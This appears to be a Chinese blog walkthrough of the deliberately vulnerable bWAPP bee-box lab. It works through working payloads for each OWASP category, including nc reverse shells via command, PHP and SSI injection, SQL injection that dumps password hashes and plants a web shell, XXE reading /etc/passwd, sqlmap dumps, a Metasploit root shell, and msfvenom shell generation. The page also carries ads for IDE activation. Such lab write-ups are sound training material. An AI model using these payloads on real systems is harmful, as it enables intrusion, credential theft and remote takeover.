bWAPP练习

bWAPP练习简介虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/如果你想自己去部署环境:https://sourceforge.net/projects/bwapp/files/bee-box/bWAPP包含有100多个漏洞,包括OWASPTop10安全风险,很爽的PHPweb靶机。登录username:bee pas…

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

简介

虚拟机下载地址: https://www.vulnhub.com/entry/bwapp-bee-box-v16,53/

如果你想自己去部署环境:https://sourceforge.net/projects/bwapp/files/bee-box/

bWAPP包含有100多个漏洞,包括OWASP Top10安全风险,很爽的PHPweb靶机。

登录username:bee  password:bug    可设置漏洞级别来增加难度低->中->高。

bWAPP练习

 

想详细了解去查阅相关文档,让我们愉快的干掉小蜜蜂

0x001 侦查

在怎样也要侦查一下这个虚拟机吧,基本的流程,拿出Nmap扫它一下下

PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           ProFTPD 1.3.1
22/tcp   open  ssh           OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 45:a4:66:ec:3a:ba:97:f8:3e:1a:ba:1c:24:68:22:e8 (DSA)
|_  2048 63:e7:c5:d1:8d:8a:94:02:36:6a:d7:d2:75:e9:8b:ce (RSA)
25/tcp   open  smtp          Postfix smtpd
|_smtp-commands: bee-box, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
80/tcp   open  http          Apache httpd 2.2.8 ((Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 mod_fastcgi/2.4.6 PHP/5.2.4-2ubuntu5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn   Samba smbd 3.X - 4.X (workgroup: ITSECGAMES)
443/tcp  open  ssl/https?
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
445/tcp  open  netbios-ssn   Samba smbd 3.0.28a (workgroup: ITSECGAMES)
512/tcp  open  exec?
513/tcp  open  login?
514/tcp  open  shell?
666/tcp  open  doom?
| fingerprint-strings: 
|   GenericLines, beast2: 
|     *** bWAPP Movie Service ***
|_    Matching movies: 0
3306/tcp open  mysql?
|_mysql-info: ERROR: Script execution failed (use -d to debug)
5901/tcp open  vnc           VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|_    VNC Authentication (2)
6001/tcp open  X11           (access denied)
8080/tcp open  http          nginx 1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: Site doesn't have a title (text/html).
8443/tcp open  ssl/https-alt nginx/1.4.0
|_http-server-header: nginx/1.4.0
|_http-title: 400 The plain HTTP request was sent to HTTPS port
|_ssl-date: 2018-11-07T10:27:37+00:00; -26d19h25m00s from scanner time.
| tls-nextprotoneg: 
|_  http/1.1
9080/tcp open  http          lighttpd 1.4.19
|_http-server-header: lighttpd/1.4.19
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port666-TCP:V=7.70%I=7%D=12/4%Time=5C06158B%P=x86_64-pc-linux-gnu%r(Gen
SF:ericLines,400,"\*\*\*\x20bWAPP\x20Movie\x20Service\x20\*\*\*\nMatching\
SF:x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0")%r(beast2,400,"\*\*\*\x20bWAPP\x20Movie\x20Service
SF:\x20\*\*\*\nMatching\x20movies:\x200\n\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\
SF:0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0");
MAC Address: F4:B7:E2:01:6D:06 (Hon Hai Precision Ind.)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: Host:  bee-box; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -26d19h39m59s, deviation: 29m59s, median: -26d19h25m00s
|_nbstat: NetBIOS name: BEE-BOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: bee-box
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: bee-box
|_  System time: 2018-11-07T11:27:32+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

有了基本的了解,开始进行漏洞的练习

0x002 A1 注入

1.HTML Injection – Reflected (GET)  

查看表单是get还是post打开浏览器 F12 查看,查看源码页面搜First name:,为了方便回放数据,使用burpsuite

<form action="/bWAPP/htmli_get.php" method="GET">

HTML <a>标签的注入 <a href=http://www.baidu.com>点此领取奖励</a>

<a href=http://www.baidu.com>点此领取奖励</a> #low
<script>alert(document.cookie)</script> #js 窃取cookie 可以展开思路去扩展,条条马路通罗马

当设置中级别的时候注入不了,尝试对代码进行转码处理 ,高级别的还无法绕过,对php不太熟悉

<a href=http://www.baidu.com>点此领取奖励</a>
#进行转码
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E

2.HTML Injection – Reflected (POST)

<a href=http://www.baidu.com>点此领取奖励</a> #low
%3Ca%20href%3Dhttp%3A%2F%2Fwww.baidu.com%3E%E7%82%B9%E6%AD%A4%E9%A2%86%E5%8F%96%E5%A5%96%E5%8A%B1%3C%2Fa%3E #medium

high 作弊办法只有 改数据了。。。。非常无耻啊啊啊!!!

POST /bWAPP/htmli_post.php HTTP/1.1
Host: 192.168.1.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.104/bWAPP/htmli_post.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 358
Cookie: PHPSESSID=f4fdf1cde23c464faf2f2d13c926dcf2; security_level=2 #改1 或 0
Connection: close
Upgrade-Insecure-Requests: 1

firstname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&lastname=%253Ca%2520href%253Dhttp%253A%252F%252Fwww.baidu.com%253E%25E7%2582%25B9%25E6%25AD%25A4%25E9%25A2%2586%25E5%258F%2596%25E5%25A5%2596%25E5%258A%25B1%253C%252Fa%253E&form=submit

3.HTML Injection – Reflected (URL)

#low 反射URL可以任意修改
GET /bWAPP/htmli_current_url.php#<script>alert(document.cookie)</script>  HTTP/1.1
Host: 192.168.1.104 #IP地址任意修改

4.HTML Injection – Stored (Blog)

<a href=http://www.baidu.com>点此领取奖励</a> #low 可写入任意的代码进行执行
#伪造登录
<div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Please login with valid credentials:<br><form name="login" action="http://192.168.1.101 /login.htm"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>

5.iFrame Injection

#low
ParamUrl=https://www.baidu.com&ParamWidth=1000&ParamHeight=1000 
ParamUrl=robots.txt" onload="alert(document.cookie)
"></iframe><script>alert(document.cookie);</script>

6.LDAP Connection Settings

#没有配置 需要自己配置下
sudo apt-get install slapd ldap-utils
sudo apt-get install phpLDAPadmin #安装web页面

clear=* #注入

7.Mail Header Injection (SMTP)

test@domain.com%0ACc:test@domain.com,%0ABcc:test@domain.com

8.OS Command Injection

#low
; whoami

www.nsa.gov && nc -vn  192.168.1.101 4444 -e /bin/bash  

#监听
nc -lvp 4444
listening on [any] 4444 ...
192.168.1.104: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.104] 51213
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

#medium
www.nsa.gov | nc -vn  192.168.1.101 4444 -e /bin/bash

high 的时候很难绕过上工具,那么多事 直接搞它

commix --url="http://192.168.1.104/bWAPP/commandi.php" --cookie="security_level=2; PHPSESSID=4a7c070b665d8d0db8ce2b02941a6a0c" --data=target="192.168.1.101&form=submit"

9.OS Command Injection – Blind

#low
127.0.0.1 && nc -vn  192.168.1.101 4444 -e /bin/bash
#high  直接用commix 

10.PHP Code Injection

#low
phpi.php?message=test;phpinfo()
message=test;system('nc -vn  192.168.1.101 4444 -e /bin/bash')
#还可以执行wget http://去下载木马 直接getshell 这种方法比瑞士军刀和反弹shell的隐藏性更好

11.Server-Side Includes (SSI) Injection

#low
<!--#exec cmd="nc 192.168.1.101 4444 -e /bin/bash" -->

#接收
nc -nlvp 4444

12.SQL Injection (GET/Search)

#low
sqli_1.php?title='+'&action=search
Iron Man' or 1=1 #
sqli_1.php?title=Iron+Man'+order+by+7+--+-&action=search
Iron Man' union select 1,2,3,4,5,6,7 #
iron' union select 1,user(),@@version,4,5,6,7 #

iron' union select 1,login,password,email,5,6,7 from users #

#可根据得到的密码进行激活成功教程
john --format:raw-sha1 /root/password.txt --show
?:bug

1 password hash cracked, 0 left


iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE
'/var/www/bWAPP/tmp.php' #

13.SQL Injection (GET/Select)

movie=1 union select 1,2,3,4,5,6,7#&action=go
movie=67 union select 1,login,3,email,password,6,7 from users#&action=go

14.SQL Injection (POST/Search)

POST 提交参数一样的道理
AJAX 简单理解输入参数立马查询,和getpost注入一样的道理,
AJAX 分同步和异步

’ ‘
1' union select 1,2,3,4,5,6,7#

1' union select 1,login,3,email,password,6,7 from users#

15.SQL Injection – Stored (XML)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

#burp中查看数据

SqlMap:脱库

sqlmap -u "http://192.168.1.104/bWAPP/sqli_1.php?title=1&action=search" --cookie="PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c; security_level=0" --dbs


available databases [4]:
[*] bWAPP
[*] drupageddon
[*] information_schema
[*] mysql

--current-db
[20:39:37] [INFO] fetching current database
[20:39:37] [INFO] retrieved: bWAPP
current database:    'bWAPP'

--current-user

[20:41:07] [INFO] fetching current user
[20:41:07] [INFO] retrieved: root@localhost
current user:    'root@localhost'

--users
database management system users [7]:
[*] ''@'bee-box'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'bee-box'
[*] 'root'@'localhost'


--passwords
cracked password 'bug' for user 'root' #直接停了不让它跑了

-D bWAPP --tables

[20:46:22] [INFO] fetching tables for database: 'bWAPP'
[20:46:23] [INFO] used SQL query returns 5 entries
[20:46:23] [INFO] retrieved: blog
[20:46:23] [INFO] retrieved: heroes
[20:46:23] [INFO] retrieved: movies
[20:46:23] [INFO] retrieved: users
[20:46:23] [INFO] retrieved: visitors
Database: bWAPP
[5 tables]
+----------+
| blog     |
| heroes   |
| movies   |
| users    |
| visitors |
+----------+

-D bWAPP -T users --columns
Database: bWAPP
Table: users
[9 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| activated       | tinyint(1)   |
| activation_code | varchar(100) |
| admin           | tinyint(1)   |
| email           | varchar(100) |
| id              | int(10)      |
| login           | varchar(100) |
| password        | varchar(100) |
| reset_code      | varchar(100) |
| secret          | varchar(100) |
+-----------------+--------------+

-D bWAPP -T users -C password --dump

Database: bWAPP                                                                
Table: users
[2 entries]
+------------------------------------------------+
| password                                       |
+------------------------------------------------+
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
| 6885858486f31043e5839c735d99457f045affd0 (bug) |
+------------------------------------------------+

--dump-all   #直接脱库

#本地激活成功教程密码太耗费时间了,可以放到服务器让它去跑。

0x003. A2 – Broken Auth. & Session Mgmt

1.Broken Auth. – CAPTCHA Bypassing

#使用burp Intruder 进行暴力激活成功教程

login=§test§&password=§123456§&captcha_user=zq9mso&form=submit

2.Broken Auth. – Forgotten Function

email=§12312414%40163.com§&action=forgot  #撞

3.Session Mgmt. – Administrative Portals

admin=1

4.Session Mgmt. – Cookies (Secure)

security_level=0; top_security=no<script>alert(1)</script>
Connection: close

5.Session Mgmt. – Session ID in URL

smgmt_sessionid_url.php?PHPSESSID=3e647cdf53c2a782805bebd9fa1c5a3c

0x004. A3 – Cross-Site Scripting (XSS)

1.XSS – Reflected (GET) (POST)

<script>alert(document.cookie)</script>

2.XSS – Reflected (JSON)

<svg onload=prompt(0)>

3.XSS – Reflected (AJAX/JSON)

<img src=1 onerror=alert(1) />

4.XSS – Reflected (Back Button)

Referer: ';alert(1);'

5.XSS – Reflected (Custom Header)

bWAPP: <script>alert(1)</script>

6.XSS – Reflected (Eval)

date=alert(1)

7.XSS – Reflected (HREF)

Referer: <script>alert(1)</script>

8.XSS – Reflected (User-Agent)

User-Agent: <script>alert(1)</script>

0x005. A4 – Insecure Direct Object References

1.Insecure DOR (Change Secret)

secret=1&login=test&action=change

2.Insecure DOR (Reset Secret)

<reset><login>bee</login><secret>Any bugs?</secret></reset> #任意修改

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///etc//passwd">]>
<rest>
  <login>&test;</login>
  <secret>login</secret>
</rest>

3.Insecure DOR (Order Tickets)

ticket_quantity=1&ticket_price=15&action=order #修改隐藏字段

#很多对价格没有进行模糊处理的BUG,即便是进行模糊处理,还可以复制小数进行测试

0x006.  A5 – Security Misconfiguration

1.Arbitrary File Access (Samba)

msf exploit(unix/misc/distcc_exec) > set rhost 192.168.1.104
rhost => 192.168.1.104
msf exploit(unix/misc/distcc_exec) > exploit 

[*] Started reverse TCP double handler on 192.168.1.101:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo vbyqH8dKW4KUZQNS;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "vbyqH8dKW4KUZQNS\r\n"
[*] Matching...
[*] B is input...

id
uid=0(root) gid=0(root) groups=0(root)

使用enum4linux 进行枚举

#详细用法https://labs.portcullis.co.uk/tools/enum4linux/
enum4linux -S 192.168.1.104 #可以直接后面加IP进行详细的信息收集
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Dec  7 17:43:26 2018

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.104
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 192.168.1.104    |
 ===================================================== 
[+] Got domain/workgroup name: ITSECGAMES

 ====================================== 
|    Session Check on 192.168.1.104    |
 ====================================== 
[+] Server 192.168.1.104 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 192.168.1.104    |
 ============================================ 
Domain Name: ITSECGAMES
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 192.168.1.104    |
 ========================================== 

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX
	WORKGROUP            FREE

[+] Attempting to map shares on 192.168.1.104
//192.168.1.104/IPC$	[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.1.104/opt	Mapping: DENIED, Listing: N/A
//192.168.1.104/tmp	Mapping: OK, Listing: OK
//192.168.1.104/print$	Mapping: DENIED, Listing: N/A
//192.168.1.104/Xerox_Phaser_8500DN_PS:7	Mapping: DENIED, Listing: N/A
//192.168.1.104/Snagit_9:6	Mapping: DENIED, Listing: N/A
//192.168.1.104/Send_To_OneNote_2010:8	Mapping: DENIED, Listing: N/A
//192.168.1.104/PDF	Mapping: DENIED, Listing: N/A
//192.168.1.104/Microsoft_XPS_Document_Writer:1	Mapping: DENIED, Listing: N/A
//192.168.1.104/HP_Officejet_6500_E710a-f_(Network):5	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax_-_HP_Officejet_6500_E710a-f_(Network):4	Mapping: DENIED, Listing: N/A
//192.168.1.104/Fax:2	Mapping: DENIED, Listing: N/A
//192.168.1.104/CutePDF_Writer:3	Mapping: DENIED, Listing: N/A
enum4linux complete on Fri Dec  7 17:43:27 2018

smbclient -L 192.168.1.104

Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       IPC Service (bee-box server (Samba 3.0.28a))
	opt             Disk      
	tmp             Disk      oh noes!
	print$          Disk      Printer Drivers
	Xerox_Phaser_8500DN_PS:7 Printer   Xerox Phaser 8500DN PS
	Snagit_9:6      Printer   Snagit 9
	Send_To_OneNote_2010:8 Printer   Send To OneNote 2010
	PDF             Printer   PDF
	Microsoft_XPS_Document_Writer:1 Printer   Microsoft XPS Document Writer
	HP_Officejet_6500_E710a-f_(Network):5 Printer   HP Officejet 6500 E710a-f (Network)
	Fax_-_HP_Officejet_6500_E710a-f_(Network):4 Printer   Fax - HP Officejet 6500 E710a-f (Network)
	Fax:2           Printer   Fax
	CutePDF_Writer:3 Printer   CutePDF Writer
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	ITSECGAMES           BEE-BOX

上传文件

smbclient \\\\192.168.1.104\\tmp -c "put test"

0x007 

1.HTML5 Web Storage (Secret)

if(typeof(Storage) !== "undefined")
{

    localStorage.login = "bee";
    localStorage.secret = "1";
    alert(localStorage.login);
    alert(localStorage.secret);

}

2.Directory Traversal – Directories

?directory=../../../../var/www/

3.Directory Traversal – Files

?page=../../../../../etc/passwd

4.Host Header Attack (Cache Poisoning)

GET /bWAPP/hostheader_1.php HTTP/1.1
Host: www.baidu.com

5.Remote & Local File Inclusion (RFI/LFI)

?language=../../../../etc/passwd&action=go

?language=http://www.baidu.com

6.Restrict Device Access

Mozilla/5.0(iPhone;U;CPUiPhoneOS4_0likeMacOSX;en-us)AppleWebKit/532.9(KHTML,likeGecko) Version/4.0.5Mobile/8A293Safari/6531.22.7

7.XML External Entity Attacks (XXE)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY popped SYSTEM "file:///etc/passwd">
]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>

8.CSRF (Change Password)

?password_new=123&password_conf=123&action=change

9.PHP Eval Function

php_eval.php?eval=echo shell_exec("cat /etc/passwd");

10.Unrestricted File Upload

#low
weevely generate 123456 shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 -e php/base64 -f raw > shelltmp.php


#high 
Remote & Local File Inclusion (RFI/LFI) 
rlfi.php?language=images/shelltmp.php.png

总结:

只对此靶机进行了黑盒测试,没对源码分析。对php这门语言没有过多的学习,还是比较懒散。运用了kali linux工具进行渗透,工具的扫描会出现误报情况和诸多漏洞扫描不出来。工具只是辅助作用,还需要进行手工重复确认,对原理知识还需进一步学习练习。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/190140.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • viewstate java_ASP.NET之ViewState

    viewstate java_ASP.NET之ViewState什么是ViewState?在asp时代,大家都知道一个html控件的值,比如input控件值,当我们把表单提交到服务器后,页面再刷新回来的时候,input里面的数据已经被清空.这是因为web的无状态性导致的,服务端每次把html输出到客户端后就不再与客户端有联系.asp.net巧妙的改变了这一点.当我们在写一个asp.net表单时,一旦标明了formrunat=server,那…

  • 机器学习总结(一):线性回归、岭回归、Lasso回归

